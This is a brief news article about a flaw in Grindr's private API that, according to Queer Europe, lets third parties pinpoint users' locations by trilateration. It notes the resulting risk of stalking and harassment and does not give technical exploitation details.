Grindr, a social networking app for the LGTBQ community, continues to struggle with API security. Earlier this year, a security flaw in Grindr's public API allowed access to users' location information, even if such users blocked this functionality in their app settings. The flaw also enabled the creation of an app that allowed Grindr users to find out who had blocked them on the app. Now, a flaw in Grindr's private API has been reported.
The latest flaw allows third parties to determine the precise location of a particular Grindr user. The private API in question fails to block third party access. Using a trilateration technique, developers have built apps that expose the user location. An app repository was made available on GitHub (the app has now been removed) exploiting the security flaw.
Queer Europe reported the flaw, and tested out the potential to exploit the flaw:
Besides mapping queer communities, it is also possible to search for the location of an individual user, even if you have no idea where this user is at that particular moment. After you have interacted with a user, for example through a chat message, you can continue to geolocate them later, whenever they share their distance online. As an experiment, a friend allowed me to track him during a Saturday night out. While sitting behind my laptop, I could see in which restaurants he was eating, in which cafes he was drinking, and in which nightclubs he was dancing. I could also see that he went to the gay sauna at 1 a.m. and then slept at a stranger’s house at 3 a.m. By making it so easy to track individuals with precision, Grindr makes its users extremely vulnerable to harassment and stalking.
Queer Europe indicates that the flaw allows for the location determination within 2 to 5 meters. The organization sees this as more than a privacy and internet security issue. Queer Europe reports the potential for harassment and stalking made possible by the API flaw. Grindr responded to the earlier concern via Twitter. Stay tuned for a similar response to this incident.